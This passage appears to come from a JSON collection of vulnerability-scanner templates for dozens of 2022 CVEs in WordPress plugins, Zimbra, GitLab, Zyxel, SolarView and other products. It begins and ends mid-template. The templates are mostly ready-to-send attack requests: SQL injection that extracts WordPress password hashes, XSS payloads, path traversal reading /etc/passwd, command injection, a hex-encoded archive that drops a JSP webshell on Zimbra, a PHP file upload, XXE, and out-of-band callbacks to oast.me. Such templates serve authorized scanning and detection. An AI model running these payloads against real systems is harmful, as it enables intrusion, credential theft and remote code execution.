name=\"changed\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_build_id\"\n\n{{form_id_1}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_token\"\n\n{{form_token}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_id\"\n\n{{form_id_2}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"status\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"scheduled[date]\"\n\n2023-04-25\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"scheduled[time]\"\n\n16:59:23\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"promote\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"name\"\n\n{{name}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"date[date]\"\n\n2023-04-24\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"date[time]\"\n\n16:59:23\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"path[auto]\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"comment\"\n\n2\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"additional_settings__active_tab\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"op\"\n\nSave\n------WebKitFormBoundaryIubltUxssi0yqDjp--\n","GET /?q=posts/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","Backdrop CMS"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"name","group":1,"regex":["name=\"name\" value=\"(.*?)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-1597","info":{"name":"WordPress WPQA <5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\nContent-Type: application/x-www-form-urlencoded\n\nuser_name={{user}}&email={{user}}@{{Host}}&pass1={{pass}}&pass2={{pass}}&phone={{rand_text_numeric(10)}}&agree_terms=on&form_type=wpqa-signup&action=wpqa_ajax_signup_process\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\nContent-Type: application/x-www-form-urlencoded\n\nuser_mail={{user}}@{{Host}}&form_type=wpqa_forget&action=wpqa_ajax_password_process&redirect_to={{url_encode(redirect_to)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{redirect_to}}","\"success\":1"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38131","info":{"name":"RStudio Connect - Open Redirect","severity":"medium"},"requests":[{"raw":["GET //%5coast.me HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[307]}]}]},{"id":"CVE-2022-38467","info":{"name":"CRM Perks Forms < 1.1.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/crm-perks-forms/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/crm-perks-forms/templates/sample_file.php?FirstName=&LastName=&%20Company= HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(content_type_2, \"text/html\")","contains(body_1, \"CRM Perks Forms\") && contains(body_2, \"\")"],"condition":"and"}]}]},{"id":"CVE-2022-24990","info":{"name":"TerraMaster TOS < 4.2.30 Server Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/api.php?mobile/webNasIPS"],"headers":{"User-Agent":"TNAS"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","TerraMaster"],"condition":"and"},{"type":"regex","part":"body","regex":["webNasIPS successful","(ADDR|(IFC|PWD|[DS]AT)):","\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\":"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32430","info":{"name":"Lin CMS Spring Boot - Default JWT Token","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cms/admin/group/all"],"headers":{"Authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZGVudGl0eSI6MSwic2NvcGUiOiJsaW4iLCJ0eXBlIjoiYWNjZXNzIiwiZXhwIjoxNzUzMTkzNDc5fQ.SesmAnYN5QaHqSqllCInH0kvsMya5vHA1qPHuwCZ8N8"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"name\":","\"level\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]},{"type":"word","part":"body","words":["alert(document.domain)\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-1020","info":{"name":"WordPress WooCommerce <3.1.2 - Arbitrary Function Call","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_key=a&perpose=update&callback=phpinfo\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td>([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2022-4447","info":{"name":"WordPress Fontsy <=1.8.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=get_tag_fonts HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=-5219 UNION ALL SELECT NULL,NULL,NULL,md5({{num}}),NULL--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{{md5(num)}}\")"],"condition":"and"}]}]},{"id":"CVE-2022-1007","info":{"name":"WordPress Advanced Booking Calendar <1.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars&setting=changeSaved&room=1111%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, '')","contains(body_2, 'advanced-booking-calendar')","contains(header_2, 'text/html')","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-1609","info":{"name":"The School Management < 9.9.7 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-json/am-member/license HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nblowfish=1&blowf=system('{{cmd}}');\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["9061-2202-EVC"]}]}]},{"id":"CVE-2022-2185","info":{"name":"GitLab CE/EE - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa","1062bbba2e9b04e360569154a8df8705a75d9e17de1a3a9acd5bd20f000fec8b","1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8","1ae98447c220181b7bd2dfe88018cb6e1b1e4d12d7b8c224d651a48ed2d95dfe","1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be","301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0","383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7","4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7","50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9","515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe","57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de","5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4","5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f","6a58066d1bde4b6e661fbd5bde83d2dd90615ab409b8c8c36e04954fbd923424","6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","739a920f5840de93f944ec86c5a181d0205f1d9e679a4df1b9bf5b0882ab848a","775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df","7d0792b17e1d2ccac7c6820dda1b54020b294006d7867b7d78a05060220a0213","8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353","90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159","95ae8966ec1e6021f2553c7d275217fcfecd5a7f0b206151c5fb701beb7baf1e","a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d","a6d68fb0380bece011b0180b2926142630414c1d7a3e268fb461c51523b63778","a743f974bacea01ccc609dcb79247598bd2896f64377ce4a9f9d0333ab7b274e","a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2","ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1","c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac","ff058b10a8dce9956247adba2e410a7f80010a236b2269fb53e0df5cd091e61d"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-29153","info":{"name":"HashiCorp Consul/Consul Enterprise - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["PUT /v1/agent/check/register HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\":\"{{randstr}}\",\"name\":\"TEST NODE\",\"method\":\"GET\",\"http\":\"http://oast.me\",\"interval\":\"10s\",\"timeout\":\"1s\",\"disable_redirects\":true}\n","PUT /v1/agent/check/deregister/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["unknown field \"disable_redirects\""]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-25485","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /alerts/alertLightbox.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=../../../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46888","info":{"name":"NexusPHP <1.7.33 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?secret=\">"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\">\">","NexusPHP"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46381","info":{"name":"Linear eMerge E3-Series - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/badging/badge_template_v0.php?layout=1&type=\"/>"],"matchers-condition":"and","matchers":[{"type":"word","words":["","Badging Template"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23854","info":{"name":"AVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support","extensions"],"condition":"and"},{"type":"word","part":"header","words":["text/ini","application/octet-stream"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1054","info":{"name":"WordPress RSVP and Event Management <2.7.8 - Missing Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RSVP Status","\"First Name\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43166","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&group_id=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-37042","info":{"name":"Zimbra Collaboration Suite 8.8.15/9.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\ncontent-type: application/x-www-form-urlencoded\n\n{{hex_decode(\"504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000000000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000f00000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b05060000000002000200d6000000e00100000000\")}}\n","GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["/service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1","/service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd"]},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 401","status_code_2 == 200","contains(body_2,'NcbWd0XGajaWS4DmOvZaCkxL1aPEXOZu')"],"condition":"and"}]}]},{"id":"CVE-2022-35151","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","\u56fe\u7247\u9884\u89c8"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0434","info":{"name":"WordPress Page Views Count <2.4.15 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5({{num}}),null,null%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46443","info":{"name":"Bangresto - SQL Injection","severity":"high"},"requests":[{"raw":["POST /bangresto-main/staff/process.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /bangresto-main/staff/insertorder.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded;\n\nitemID[]=1&itemqty[]=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a7a6b71,md5({{num}}),0x7178717a71,0x78))s), 8446744073709551610, 8446744073709551610)))&sentorder=Sent to kitchen\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-32771","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?success=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["avideoAlertSuccess(\"","text: \""],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28363","info":{"name":"Reprise License Manager 14.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","Login Failed"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24288","info":{"name":"Apache Airflow OS Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/airflow/code?root=&dag_id=example_passing_params_via_test_command","{{BaseURL}}/code?dag_id=example_passing_params_via_test_command"],"stop-at-first-match":true,"matchers":[{"type":"word","words":["foo was passed in via Airflow CLI Test command with value {{ params.foo }}"]}]}]},{"id":"CVE-2022-31845","info":{"name":"WAVLINK WN535 G3 - Information Disclosure","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /live_check.shtml HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["Model=","FW_Version=","LanIP="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21500","info":{"name":"Oracle E-Business Suite <=12.2 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/OA_HTML/ibeCAcpSSOReg.jsp","{{BaseURL}}/OA_HTML/ibeCRgpPrimaryCreate.jsp","{{BaseURL}}/OA_HTML/ibeCRgpIndividualUser.jsp","{{BaseURL}}/OA_HTML/ibeCRgpPartnerPriCreate.jsp"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["Registration","Register as individual",""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-48012","info":{"name":"OpenCATS 0.9.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /index.php?m=settings&a=ajax_tags_upd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntag_title=\n"],"matchers":[{"type":"dsl","dsl":["contains(body_1, \"opencats - Login\")","contains(body_3, \"\")"],"condition":"and"}]}]},{"id":"CVE-2022-29014","info":{"name":"Razer Sila Gaming Router 2.0.441_api-2.0.418 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /ubus/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"jsonrpc\":\"2.0\",\"id\":3,\"method\":\"call\",\"params\":[\"4183f72884a98d7952d953dd9439a1d1\",\"file\",\"read\",{\"path\":\"/etc/passwd\"}]}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0148","info":{"name":"WordPress All-in-one Floating Contact Form <2.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40881","info":{"name":"SolarView 6.00 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /network_test.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nhost=%0a{{cmd}}%0a&command=ping\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2174","info":{"name":"microweber 1.2.18 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/module?type=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&live_edit=true&from_url=test"],"matchers":[{"type":"dsl","dsl":["status_code == 500","contains(body, \"\") && contains(body, \"microweber\")","contains(content_type, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2022-1952","info":{"name":"WordPress eaSYNC Booking <1.1.16 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID=a0d5959357e474aef655313f69891f37\nContent-Type: multipart/form-data; boundary=------------------------98efee55508c5059\n\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"action\"\n\neasync_session_store\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"type\"\n\ncar\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"with_driver\"\n\nself-driven\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"driver_license_image2\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n\n\n--------------------------98efee55508c5059--\n","GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID=a0d5959357e474aef655313f69891f37\n","GET /wp-content/uploads/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_3","words":["{{md5(string)}}"]}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["wp-content\\\\\\/uploads\\\\\\/([0-9a-zA-Z]+).php"],"internal":true}]}]},{"id":"CVE-2022-4306","info":{"name":"WordPress Panda Pods Repeater Field <1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-content/plugins/panda-pods-repeater-field/fields/pandarepeaterfield.php?itemid=1&podid=1);%20alert(document.domain);/*x&iframe_id=panda-repeater-add-new&success=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"panda-repeater-add-new\")"],"condition":"and"}]}]},{"id":"CVE-2022-0814","info":{"name":"Ubigeo de Peru < 3.6.4 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=rt_ubigeo_load_distritos_address&idProv=1%20UNION%20SELECT%201,(SELECT%20user_login%20FROM%20wp_users%20WHERE%20ID%20=%201),(SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID%20=%201)%20from%20wp_users#\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["idProv","idDist","distrito"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43769","info":{"name":"Hitachi Pentaho Business Analytics Server - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName('{{interactsh-url}}')}&mgrDn=a&pwd=a"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["false"]},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2022-3800","info":{"name":"IBAX - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nPOST /api/v2/open/rowsInfo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\norder=1&table_name=pg_user\"%3b+select+pg_sleep(6)%3b+--\"&limit=1&page=1\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"usesysid\")"],"condition":"and"}]}]},{"id":"CVE-2022-22242","info":{"name":"Juniper Web Device Manager - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error.php?SERVER_NAME="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","The requested resource is not authorized to view"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2414","info":{"name":"FreeIPA - XML Entity Injection","severity":"high"},"requests":[{"raw":["POST /ca/rest/certrequests HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n\n ]>\n\n \n &ent;\n\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"body","words":["PKIException"]},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-22733","info":{"name":"Apache ShardingSphere ElasticJob-UI privilege escalation","severity":"medium"},"requests":[{"raw":["POST /api/login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAccess-Token:\nContent-Type: application/json;charset=UTF-8\nOrigin: {{RootURL}}\nReferer: {{RootURL}}\n\n{\"username\":\"guest\",\"password\":\"guest\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"isGuest\":true","\"accessToken\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30525","info":{"name":"Zyxel Firewall - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /ztp/cgi-bin/handler HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 